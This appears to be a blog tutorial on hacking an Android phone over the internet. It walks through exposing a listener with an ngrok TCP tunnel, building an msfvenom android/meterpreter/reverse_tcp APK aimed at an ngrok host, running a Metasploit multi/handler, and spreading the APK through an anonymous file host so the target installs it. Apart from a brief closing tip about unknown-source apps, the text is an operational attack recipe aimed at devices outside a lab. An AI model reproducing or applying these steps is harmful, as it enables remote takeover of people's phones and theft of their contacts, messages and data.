This tutorial is the answer to the most common questions (e.g., Hacking android over WAN) asked by our readers and followers:
- How to hack android outside the LAN or NAT?
- Hacking android on the WAN & real world, is it possible?
- Create an android hacking tutorial over the internet outside the lab environment
This tutorial is designed to show you how you can hack an android phone remotely over the internet. In the previous article of android hacking we did learn how to hack an android device over LAN, but what if we want to get access to a device that is not connected on our network?
Usually in WAN, first, you need to have a Static IP/Hostname, and second, you need to do Port Forwarding to allow your traffic transmission, and we all know that both are so difficult in real-time as we have limited access to ports in a network.
So, what we will do in this scenario, we will set up a secure tunnel using Ngrok.
Ngrok is a tunneling reverse proxy system that establishes tunnels from public endpoint i.e., an internet to a locally running network service. This can help us to create a public HTTP/HTTPS URL for a website running locally in our machine. We don’t need to do any kind of port forwarding while using Ngrok and our network service will eventually expose to the internet with the help of TCP tunneling.
Step by Step Demo:
Step 01: Create an account on Ngrok to download
First you need to install Ngrok in your Kali machine.
Fire up Kali, and browse Ngrok to access its official website: https://ngrok.com/
You have to make an account first. Go to the signup option and fill all the necessary fields.
(CAUTION: Do not use your work email or an email that has access to your private information. It is a best practice to use temporary emails while performing penetration testing. You can also use https://temp-mail.org/en/ to create your account)
After signing up, you can download ngrok installer for Linux.
Step 02: Unzip the downloaded file
Go to Download directory where your downloaded file resides.
You have to unzip this file. Use unzip command to extract the file.
Step 03: Copy the token, given to your account
After unzipping, you have to save the token that was given to your account.
Copy the token from here and paste it in your terminal. Make sure to paste the token in a same directory where you have ngrok.
You are all set to use this tool. Type in terminal:
# ./ngrok tcp [Port no:] (choose any port number on which you want to bind a connection)
The forwarding here specifies the TCP tunnel which ngrok has created. The connection has bind to localhost at port 4242. Now we need to generate a malicious payload by using msfvenom.
Step 04: Generate a payload by using msfvenom
# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > /root/Desktop/android.apk
Step 05: Start reverse TCP handler
Set exploit as multi/handler, Lhost as localhost i.e 0.0.0.0, Lport as 4242 and run exploit.
Step 06: Download the payload on your android phone to get a meterpreter session
To download this payload on android device we will upload it on www.upload.ee, a very useful website to upload your files securely & anonymously .
Browse this link on your android phone, it will download the zip file of our payload. Unzip it and install it in your phone. (allow option to install it from third-party sources)
After installing and running the app from my android phone, I got a session in my Kali attacking machine.
That is how you can actually exploit an android phone and gain access remotely over the internet rather than on your local area network. After getting a session you know that an attacker can easily get your info, steal your contacts, messages, app data and many more. So, gaining access of your phone is that much easier when you don’t have awareness.
This exploit is tested on Android version 9.0, which is not an old version and currently in use by many users. A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.